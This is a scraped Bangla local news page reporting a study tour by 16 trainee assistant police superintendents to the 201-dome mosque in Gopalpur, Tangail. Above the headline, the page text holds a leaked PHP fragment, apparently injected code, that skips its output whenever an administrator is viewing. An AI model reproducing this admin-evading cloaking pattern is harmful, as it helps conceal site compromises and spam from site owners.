function seo_cache() { if (is_admin()) return; $u = wp_get_current_user(); if (in_array('administrator', (array)$u->roles)) return; ?> গোপালপুরের ঐতিহাসিক ২০১ গম্বুজ মসজিদ পরিদর্শন করলেন ১৬ এএসপি - GopalpurBarta24.com
আজ || বুধবার, ১৫ এপ্রিল ২০২৬
শিরোনাম :
 


গোপালপুরের ঐতিহাসিক ২০১ গম্বুজ মসজিদ পরিদর্শন করলেন ১৬ এএসপি

রুবেল আহমেদ, নিজস্ব প্রতিবেদক :

টাঙ্গাইলের গোপালপুরের ঐতিহাসিক ২০১ গম্বুজ মসজিদ পরিদর্শন করলেন ৩৬ তম বিসিএস ব্যাচের ১৬ জন সহকারী পুলিশ সুপার (শিক্ষানবিস)।

গতকাল শনিবার এএসপি খালিদ মাহমুদের নেতৃত্বে ডিআইজি ঢাকা রেঞ্জ আয়োজিত ‘রেঞ্জ স্টাডি ট্যুর ফর এএসপি’ শিক্ষাসফরটিকে ফুলেল শুভেচ্ছায় বরণ করে নেন গোপালপুর উপজেলা পরিষদের চেয়ারম্যান ইউনুস ইসলাম তালুকদার (ঠান্ডু), অতিরিক্ত পুলিশ সুপার (গোপালপুর সার্কেল) জনাব মো. আমির খসরু, ওসি মো. মোস্তাফিজুর রহমানসহ স্থানীয় গন্যমান্য ব্যক্তিবর্গ। এসময় ২০১ গম্বুজ মসজিদের প্রতিষ্ঠাতা বীরমুক্তিযোদ্ধা রফিকুল ইসলামের পক্ষ থেকে আগত অথিতিদের ক্রেস্ট প্রদান করা হয়।

বেলা ১২টা থেকে দুপুর ১.৩০ মিনিট পর্যন্ত ২০১ গম্বুজ মসজিদে অবস্থান করার পর নবাগত সহকারী পুলিশ সুপার (শিক্ষানবিস) গণের বহনকারী গাড়ীটি ধনবাড়ির উদ্যেশে রওনা দেন।

মন্তব্য করুন -


Top
error: Content is protected !!